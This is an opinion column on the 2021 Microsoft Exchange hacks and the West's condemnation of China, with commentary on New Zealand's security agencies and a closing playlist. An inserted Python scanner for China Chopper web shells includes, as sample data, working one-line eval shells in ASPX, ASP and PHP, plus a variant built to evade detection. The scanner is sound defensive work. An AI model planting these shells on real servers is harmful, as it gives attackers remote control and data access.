The timing was one of the weirder aspects of this week’s cyber condemnation of China by the West. Why was this piece of
political theatre being staged now? China’s (and Russia’s) sponsoring and/or condoning of semi-state and criminal hacker
groups has been known about for nigh on a decade. More particularly, Microsoft had been alerted to the flaws in its
Microsoft Exchange product in early January, and had (belatedly) issued patches to correct those flaws in early March.
At that time, the company admitted that the four major flaws in Microsoft Exchange had been exploited by a group of
Chinese hackers that Microsoft called Hafnium. It blamed the Chinese government
for harbouring the group. (Hafnium is the same state-sponsored group that Canada and New Zealand have called APT 40.
APT stands for Advanced Persistent Threat.)
So why did the US, the UK, the EU, Australia, Japan etc etc take until July 20 to tell the world that Chinese hackers
have exploited flaws in Microsoft Exchange and that this sort of behaviour must stop, or else? What interests of
political theatre are being served by making a song and dance now – over three months after White House officials had publicly chided Microsoft,
and told the company that issuing inadequate security patches for Microsoft Exchange was not a good enough response to
the failings in its product?
In New Zealand’s case, how could it be that the (paywalled) Australian newspaper was able to tell its readers that New Zealand and Canada were about to condemn China’s complicity in the Microsoft hack,
before GCSB Minister Andrew Little informed New Zealanders late on Monday night? On Monday, the Crikey website cited
the Australian story to the same effect: negative comment on China from New Zealand and Canada would be forthcoming. While the
commentariat pondered whether New Zealand should be applauded or criticised for daring to criticise China, a raft of
other questions went unanswered.
Such as: what responsibility does a lucrative tech giant like Microsoft bear for (a) having readily exploitable flaws in
Microsoft Exchange and (b) taking its own sweet time to alert its customers to the problems and provide them with
security patches that still (see below) seem to have left a ‘back door’ open? Unfortunately, Bill Gates didn’t get to
where he is today by making the quality of Microsoft’s products an overriding concern. Beyond Microsoft, what
oversight/testing capability do (or should) security agencies have for vetting digital products that can compromise the
privacy and data of individuals and firms? The banking system requires certain stewardship standards from those
entrusted with caring for the public’s wealth. No similar standards seem to apply to the highly profitable companies
entrusted with caring for the public’s digital data.
In the US, the FBI obtained a court order in March
to enter the networks of businesses and remove the web shells that cyber attackers had planted as ‘back doors’ after exploiting the
vulnerabilities in Microsoft Exchange. In lieu of adequate corporate responsibility, is this kind of exercise of state
power a good idea, or a bad idea?
The state may need to get more involved. The unfortunate reality is that almost all the recent major hacks have been
discovered by individuals or by private players, such as the FireEye security firm that discovered the SolarWinds hack
last December. As things stand, we seem to be relying on the private sector and on computer nerds to check and report on
the adequacy of the tools we use to carry our digital data. At the very least, it should be made mandatory for the
companies selling these systems to report the vulnerabilities in their products immediately on discovery. Ironically,
Microsoft and the FireEye security firm are both currently lobbying Congress
to make breach reporting mandatory. That legal requirement isn’t currently in place. Tech companies can limit breach
disclosures to protect their share price.
Looking ahead, would it be better - or worse - to call in the FBI (or the GCSB and SIS) when product failings become
apparent, and when vital socio-economic organisations are being attacked for reasons of ransom, IP theft or
cyberespionage? Either way, this is not a great situation. With reason, some people may not want to have the SIS
in a position where it could trawl through their health data, even while acting as a line of privacy defence.

Actual risk, appropriate response
Why, one wonders, are the attacks on Microsoft by Chinese operatives being treated by the West as so much worse than the
SolarWinds hack detected in December, a raid widely attributed to Russian-based operatives? In the SolarWinds hack –
also made possible by flaws in the company’s products – it is believed the Russian hackers went for nine months
undetected, while they ransacked files held by the US Treasury, Justice etc and some 18,000 other government agencies
and private firms (see the Special Footnote below on what “affected” meant in practice). That attack too was preceded by any number of Russian attacks on everything from the IOC to the
integrity of elections in the US and France. If hacking were an Olympic sport, Russia and China would both be medal contenders.
So…why has the Western club of nations decided that now is the right time to join together to condemn China, when it
hasn’t rallied the same team effort to blame Russia for its (equally or more damaging) persistent online behaviours? It
looks very much as if New Zealand has been wrangled into joining the chorus line in a White House-led effort intended to
put China (and the world) on notice that the US is back, and in charge of Team West. Basically, we have been pressured
into putting our trade and diplomatic relationship with China in jeopardy, in the service of what is largely an exercise
in image building by US President Joe Biden. This week, there hasn’t been any evidence of New Zealand having an
“independent” foreign policy. Or much sign of our fabled ability to juggle our trade links with China, and our defence
and security links with the Americans. Plainly, under Biden, the space for that kind of fancy footwork is going to
shrink.

Here, at Home
The cyber security questions don’t stop there. Apparently, we are regularly coming under cyber-attack by hackers
sponsored by or operating with the tacit blessing of several other nation states, including the hacker groups acting on
behalf of our main trading partner. If that’s the case, why aren’t we being told which countries are believed to have
been responsible for the major hacks and ransomware demands that have happened here, of late?
For example: the public has been left in the dark as to the likely national origins of the hackers who committed the
cyber-attacks on (a) the NZ stock exchange in mid 2020 and (b) the Waikato DHB this year. Moreover, we aren’t being told
if these attacks are being launched by foreign criminal gangs or by foreign state agencies, or by individuals with a
foot in both camps. Do our security agencies even know such details? It would help public confidence to know how well
our cyber defenders are coping with the traffic.
Rumour has it that in both those major NZ hacks, Russian-speaking criminal gangs working with the blessing of the
Russian government were responsible. It would still be nice though, to be officially told who our security agencies
regard as the prime suspects. Instead, we’re being rallied by the Ardern government to the threat posed by China even
though we haven’t been offered any evidence as to which New Zealand individuals, firms or state agencies (if any) have
suffered actual harm at the hands of these Chinese APT groups.
The question is not merely why we’re marching in step with our traditional allies to name and shame China on the world
stage. To repeat: GCSB Minister Andrew Little has refused to name even the country of origin of the hackers at the
Waikato DHB, or any of the local victims of the multitude of hacks earlier this year via Microsoft Exchange. His answer
this week has been that there are issues of national security and “commercial in confidence reasons” that prevent him
from commenting further on such matters. Really? This is one area where the public’s right to know who has been
violating their privacy and/or stealing their data is more important than the possibility that some commercial firms
might lose market share (or some state agencies might lose face) if their inability to protect the public’s data were to
be disclosed. Most people would blame Microsoft, not their hapless local customers.
Thank goodness that during the Vietnam War, similar issues of “commercial in confidence” sensitivity didn’t prevent us
from finding out that Dow Chemical were making Agent Orange in New Plymouth. In a transparency sense at least, those
were the good old days.

Hafnium, APT 40
The first public sign of the vulnerabilities in Microsoft Exchange was reported to the company (and to the world at
large) on January 5th in this tweet
by a DEVCORE researcher using the handle “Orange Tsai.” Initially it was thought that attacks exploiting the four “zero
day” flaws began on January 6th. The Volexity site has since reported
that those attacks began three days earlier, on January 3.
For background: Microsoft Exchange Server is an email inbox, calendar, and collaboration solution. Users range from
giant multinationals to small and medium-sized businesses worldwide. The damage suffered by users of
the flawed versions of Microsoft Exchange has depended on the adequacy of the security patches, on the speed at which
Microsoft made them available, and on how quickly users installed them. ZDNet has explained here
the four basic flaws, the kind of attacks mounted on them, and the response by Microsoft. The subsequent
investigations have included the possibility that the attackers were tipped off by an insider:
Microsoft is now also reportedly investigating potential links
between PoC attack code issued privately to cybersecurity partners and vendors prior to patch release and exploit tools
spotted in the wild, as well as the prospect of an accidental -- or deliberate -- leak that prompted a spike in attacks.
If used in an attack chain, all of the four main vulnerabilities cited could lead to “Remote Code Execution (RCE),
server hijacking, backdoors, data theft, and potentially further malware deployment….”
As mentioned, Microsoft has blamed
a Chinese state-sponsored group it calls Hafnium for the subsequent attacks. There is useful background information on Hafnium here.
Here’s how the attackers did it:
The attacks included three steps. First, it would gain access to an Exchange Server either with stolen passwords or by
using the previously undiscovered vulnerabilities to disguise itself as someone who should have access. Second, it would
create what’s called a web shell to control the compromised server remotely. Third, it would use that remote access –
run from the U.S.-based private servers – to steal data from an organization’s network.
To an outsider, that last point – that the Chinese hackers (and presumably those sponsored by other nation states) are
launching their attacks via a web of virtual private servers located in the US, partly in order to conceal their true
location – seems a bit surprising, and ironic. It suggests a possible means of defence. Namely, don’t lease US servers to
Chinese, Russian or North Korean based enemies of the state, or their representatives. This is maybe where the FBI could
be of some use, in tracing who hired those servers, and from where.

Was China the sole player?
Even when it comes down to just the cyber attacks made via Microsoft Exchange, it’s doubtful that Hafnium (aka APT 40)
were the only culprits. Microsoft’s own alerts, accessible here,
explicitly say others were involved:
[03/08/2021]: Microsoft continues to see multiple actors taking advantage of unpatched systems to attack organizations with
on-premises Exchange Server….
Update [03/05/2021]: Microsoft sees increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious
actors beyond HAFNIUM.
Who were these other players? ZDNet’s chronology of how the crisis developed in early March shows how quickly it became open
season on Microsoft Exchange. Even so, several of the other identified attackers also seem to have been
Chinese-speaking. They included the notorious APT 27 group, also known as LuckyMouse, which has a history of cyber
breaches stretching back to 2010. This year, it made successful inroads into several US gaming companies.
Calypso, one of the other hacker groups involved, is a cyber-espionage group that Russian sources say has “Asian roots.”
Winnti Group, another team named as being involved, is also Chinese-based. Reportedly,
while LuckyMouse has tended to specialise in cyber-espionage, Winnti Group tends to be a for-profit operation.
The US Cybersecurity and Infrastructure Security Agency (CISA) says that it is "aware of threat actors using open source
tools to search for vulnerable Microsoft Exchange Servers." On March 10, ESET said that 10 APT groups
have been connected to attacks exploiting the Exchange Server vulnerabilities. These state-sponsored groups include
LuckyMouse, Tick, Winnti Group, and Calypso. F-Secure researchers have called the situation
a "disaster in the making," adding that servers are "being hacked faster than we can count."
The slew of attacks in March via Microsoft Exchange mushroomed:
Mandiant says further attacks against US targets
include local government bodies, a university, an engineering company, and retailers. The cyberforensics firm believes
the vulnerabilities could be used for the purposes of ransomware deployment and data theft. Sources have told
cybersecurity expert Brian Krebs that at least 30,000 organizations
in the US have been hacked. Bloomberg estimates put this figure closer to 60,000
as of March 8. Palo Alto Networks suggests there were at least 125,000 unpatched servers
worldwide, as of March 9.
Things quickly got worse:
On March 11, Check Point Research said that attack attempts leveraging the vulnerabilities were doubling every few hours
. On March 15, CPR said attack attempts increased 10 times based on data collected between March 11 and March 15. The
US, Germany, and the UK are now the most targeted countries. Government and military targets accounted for 23% of all
exploit attempts, followed by manufacturing, financial services, and software vendors. The US Cybersecurity and
Infrastructure Security Agency (CISA) says that it is "aware of threat actors using open source tools to search for
vulnerable Microsoft Exchange Servers."
As mentioned, some of the APT groups cited above had previously been associated with intrusions conducted mainly for
reasons of cyberespionage or IP theft, and not with ransomware attacks for profit. However, this pattern seems to be changing,
as state actors and criminal gangs appear to be co-operating in launching ransomware demands, and are sharing their attack tools
to do so. Reportedly, they may also be splitting the proceeds. The tools of the trade include
these items:
In a situation reminiscent of the 2017 WannaCry ransomware outbreak, on March 12, Microsoft said
that a variant of ransomware known as DoejoCrypt/DearCry is leveraging the bugs to deploy ransomware on vulnerable
Exchange servers…The deployment of web shells, such as China Chopper
, on compromised Exchange servers has proved to be a common attack vector
. Batch files written to servers infected with ransomware may ensure access is maintained to vulnerable systems, even
after infections have been detected and removed.
China Chopper is a tiny but crucial part of the APT arsenal when it comes to creating enduring ‘back doors’ into online
targets: the server-side component is a one-line script that simply executes whatever code the attacker sends it in a web request. FireEye’s useful brief description of China Chopper is available here.
ZDNet has also explained the qualities of China Chopper
that make it such a useful ‘back door’ instrument.
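The three-step attack chain quoted above (gain access, drop a web shell, use it to steal data) leaves a file on the Exchange server that defenders can look for. As an added illustration, not code from the original column or from any of the vendors it cites, here is a small Python scanner for the one-line “eval” web shells of the China Chopper family. The signatures cover the ASPX (JScript), classic ASP and PHP variants; the directory names in SUSPECT_DIRS are drawn from public reporting on where the Exchange shells were dropped, not from this page, and the sample files are constructed for the example.

```python
import re
from dataclasses import dataclass

# Signatures for the one-line "eval what the request contains" web shells.
# Real Exchange ASPX pages also begin with "<%@ Page Language=...", so the
# match is keyed on the eval-of-request-data construct, not on the directive.
SHELL_SIGNATURES = {
    # ASPX/JScript: eval(Request.Item["pw"], "unsafe")
    "aspx_jscript_eval": re.compile(
        r'eval\s*\(\s*Request\.Item\[[^\]]+\]\s*,\s*"unsafe"\s*\)', re.I),
    # Classic ASP/VBScript: <%eval request("pw")%>
    "asp_vbscript_eval": re.compile(
        r'<%\s*eval\s*\(?\s*request\s*\(\s*"[^"]+"\s*\)\s*\)?\s*%>', re.I),
    # PHP: <?php @eval($_POST['pw']); ?>
    "php_eval_post": re.compile(
        r'@?eval\s*\(\s*\$_(POST|REQUEST)\s*\[[^\]]+\]\s*\)', re.I),
}

# Web-reachable directories that publicly reported Exchange intrusions used
# as drop locations (assumption for this example; extend for your estate).
SUSPECT_DIRS = ("/aspnet_client/", "/owa/auth/", "/ecp/auth/")
TINY_ASPX_BYTES = 300  # a China Chopper page is a few dozen bytes long


@dataclass(frozen=True)
class Finding:
    path: str
    rule: str
    snippet: str


def scan_file(path: str, content: str) -> list[Finding]:
    """Return the findings for one file: signature hits first, then a
    size-and-location heuristic for shells that dodge the signatures."""
    findings = []
    norm = path.replace("\\", "/").lower()
    for rule, rx in SHELL_SIGNATURES.items():
        m = rx.search(content)
        if m:
            findings.append(Finding(path, rule, m.group(0)[:80]))
    # An unsigned, tiny .aspx in a known drop directory is still worth a look.
    if (not findings and norm.endswith(".aspx")
            and len(content) < TINY_ASPX_BYTES
            and any(d in norm for d in SUSPECT_DIRS)):
        findings.append(Finding(path, "tiny_aspx_in_suspect_dir", content[:80]))
    return findings


def scan_tree(files: dict[str, str]) -> list[Finding]:
    """Scan a {path: content} mapping (in practice, the files under the
    Exchange and IIS web roots, read as text)."""
    out = []
    for path, content in files.items():
        out.extend(scan_file(path, content))
    return out


# Constructed sample files: four planted shells and one benign Exchange page.
SAMPLE_FILES = {
    r"C:\inetpub\wwwroot\aspnet_client\system_web\help.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["orange"],"unsafe");%>',
    r"C:\inetpub\wwwroot\legacy\cmd.asp":
        '<%eval request("pass")%>',
    "/var/www/html/uploads/img.php":
        "<?php @eval($_POST['cmd']); ?>",
    # Lightly reworked shell: no signature hit, but tiny and in a drop directory.
    r"C:\inetpub\wwwroot\aspnet_client\a.aspx":
        '<%@ Page Language="Jscript"%><%var a=Request.Item["z"];eval(a,"unsafe");%>',
    # Benign: a full-sized page in owa/auth with no eval-of-request construct.
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorFE.aspx":
        '<%@ Page Language="C#" AutoEventWireup="true" %>\n<html><body>\n'
        + "<p>Something went wrong.</p>\n" * 20 + "</body></html>\n",
}

if __name__ == "__main__":
    for f in scan_tree(SAMPLE_FILES):
        print(f"{f.rule:28} {f.path}\n    {f.snippet}")
```

The signature rules are precise but brittle (the fourth sample shows how one renamed variable defeats them), which is why the heuristic rule is there; on a real server the heuristic should be tightened further with file creation times, since a legitimate Exchange page is not created on the day of an intrusion.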
Finally….all the above information is being freely published and debated elsewhere. It is time the NZ government and its
security agencies were more forthcoming about the cyber attacks on our firms and state agencies. Our security agencies
were supposed to be entering a new era of transparency, and have recently been engaged in re-branding exercises to that
effect. Yet when it comes to cyber security, they’re ducking back into the worst “zipped lips, we know best” practices
of yore. These come down to a “trust us, we’re the experts and we know what we’re doing” approach. It has never seemed to
occur to the SIS and the GCSB that the public’s trust is not a given, but something that has to be earned. Right now,
cyber security isn’t a field where the state “experts” hold all the cards, or even many of the relevant ones.
Special Footnote: The above article refers to 18,000 customers affected by the SolarWinds hack. However, a SolarWinds company
representative has since been in contact and referred me to an official investigation.
Here’s the key paragraph:
“….of the approximately 18,000 affected public and private sector customers of Solar Winds’ Orion product, a much
smaller number have been compromised by follow-on activity on their systems. We have so far identified fewer than ten
U.S. government agencies that fall into this category, and are working to identify and notify the non-government
entities who also may be impacted.
Clearly there’s a spectrum involved here, ranging from “affected” to being “compromised by follow-on activity.” While 250
US agencies and entities were originally reported as “affected” by the hack, the reference to “fewer than ten US
government agencies” being subject to “follow-on activity” is a bit disingenuous, given the importance of some of those
agencies: Justice, Energy, Homeland Security, Commerce and the State Department.
Footnote One: Mindful of what happened subsequently at Waikato DHB, the trend of targeting healthcare providers had been identified by Microsoft
last October. The spread of cyber attacks to US hospitals is also discussed by NBC news here.
Footnote Two: The term “cybersecurity” conjures up images of ninja attacks by elite Asian hackers and Russian SMERSH agents out to (a)
steal the intellectual property of our corporates, and (b) disrupt the key strategies of our politicians and diplomats.
Not to mention the theft and extortion rackets being run by criminal gangs whose names seem torn from the pages of a
James Bond novel.
For sure, there are some bad players out there in cyberspace. Yet cyber-security also seems to consist of democratic
governments building and deploying platforms for pro-active cyber offensives aimed at hostile foreign powers, and even (when it comes down to stealing trade secrets) at a few of our friends and allies. What I’m getting at is that cybersecurity is not just about
building up our resilience/resistance capabilities on the home front. Last year, the Australians were upfront about what they have in mind:
Australia will recruit 500 cyber spies and build on its offensive capabilities to take the online fight overseas in a
$1.3 billion funding boost……The Australian Signals Directorate will also share intelligence with government departments
and companies in near real time as part of the biggest ever cash injection to Australia's cyber defences. Prime Minister
Scott Morrison [announced] the ASD will be given more than $1 billion over the next decade to disrupt foreign cyber
criminals and better identify malicious hacks.
Hmm. So… Australia aims to “build on its offensive capabilities to take the online fight overseas.” Clearly, in the age
of cyber conflict, hack attacks are just another form of force projection. And “our side” is doing it, too.
This week’s Spotify playlist kicks off with a track from the Superwolves collaboration between Will Oldham and Matt Sweeney, and they’re backed on this cut by the great Sahel region guitarist
Mdou Moctar and his band. The hybrid result sounds like West African rockabilly. That’s why I’ve segued into the
classic “Obaa Sima” dance cut from Ghana. There’s a fascinating documentary available here on Youtube
about how this terrific piece of music was recorded, buried, re-discovered and has since spread around the world, much
to the amazement of the humble “Ata Kak” guy who made it.
Everything else is pretty self-explanatory. Desperate Journalist are a four-piece British band - two women, two blokes
- based in London. The playlist’s closing cut “Banks of the Hope” is not just an optimistic metaphor, though it is that,
too. The Hope River runs through the St Andrew parish of Kingston, Jamaica. You should check out this beautiful video
featuring Agent Sasco – who grew up on the riverside – as he stands on the bridge that links his old neighbourhood of
Kintyre (in St Andrew parish) to the rest of the world. That line about wanting “better public transport” is only part
of what the community needs.
Here’s the playlist: